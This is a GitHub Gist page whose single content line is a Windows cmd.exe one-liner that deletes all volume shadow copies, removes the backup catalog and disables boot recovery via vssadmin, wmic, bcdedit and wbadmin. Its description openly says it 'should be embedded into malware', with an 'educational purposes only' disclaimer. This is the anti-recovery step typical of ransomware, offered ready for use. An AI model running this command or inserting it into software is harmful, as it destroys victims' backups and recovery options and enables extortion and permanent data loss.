Created
January 28, 2022 21:10
-
-
Save augustgl/66b4f301aced3402f8f5fe0d05c92dc4 to your computer and use it in GitHub Desktop.
Delete shadow copies of volumes and disable startup repair on windows systems. Should be embedded into malware. Educational purposes only
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cmd.exe /C vssadmin.exe delete shadows /all /quiet & wmic.exe shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment